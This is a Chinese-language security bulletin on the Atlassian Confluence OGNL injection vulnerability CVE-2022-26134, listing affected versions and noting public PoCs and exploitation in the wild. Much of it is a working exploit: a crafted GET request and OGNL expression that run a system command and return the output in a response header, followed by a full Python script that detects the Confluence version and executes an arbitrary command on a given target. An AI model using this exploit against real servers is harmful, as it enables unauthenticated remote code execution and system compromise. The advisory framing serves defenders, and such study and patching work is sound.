近日,Atlassian官方发布了Confluence Server和Data Center OGNL 注入漏洞(CVE-2022-26134)的安全公告。该漏洞的CVSS评分为10分,目前漏洞细节与PoC已被公开披露,且被检测到存在在野利用。
? ? ? Atlassian Confluence是Atlassian公司出品的专业wiki程序。攻击者可利用漏洞在未经身份验证的情况下,远程构造OGNL表达式进行注入,在Confluence Server或Data Center上执行任意代码。请相关用户尽快自检并采取措施进行防护。
?
目前受影响的 Atlassian Confluence Server and Data Center 版本:
Atlassian Confluence Server and Data Center < 7.4.17
7.5.0 ?≤ Atlassian Confluence Server and Data Center < 7.13.7
7.14.0 ≤ Atlassian Confluence Server and Data Center < 7.14.3
7.15.0 ≤ Atlassian Confluence Server and Data Center < 7.15.2
7.16.0 ≤ Atlassian Confluence Server and Data Center < 7.16.4
7.17.0 ≤ Atlassian Confluence Server and Data Center < 7.17.4
7.18.0 ≤ Atlassian Confluence Server and Data Center < 7.18.1
?
漏洞利用发送如下请求即可执行任意命令,并在HTTP返回头中获取执行结果:
GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1Host: your-ip:8090Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Connection: close
OGNL表达式为:
?
${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
?
?
import requestsimport reimport sysfrom bs4 import BeautifulSoupimport urllib3urllib3.disable_warnings()def check(host):r = requests.get(host+"/login.action", verify=False)if(r.status_code == 200):filter_version = re.findall("<span id='footer-build-information'>.*</span>",r.text)if(len(filter_version)>=1):version = filter_version[0].split("'>")[1].split('</')[0]return versionelse:return Falseelse:return hostdef exploit(host, command):headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36','Content-Type': 'application/x-www-form-urlencoded','Accept': '*/*',}r = requests.get(host + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)if(r.status_code == 302):return r.headers['X-Cmd-Response']else:return Falseif(len(sys.argv) < 3):print("USE: python3 " + sys.argv[0] + " https://target.com cmd")print("ex: python3 " + sys.argv[0] + " https://target.com id")else:target = sys.argv[1]cmd = sys.argv[2]version = check(target)print("============ GET Confluence Version ============")if(version):print("Version: " + version)else:print("Version: Not Found")print(exploit(target, cmd))
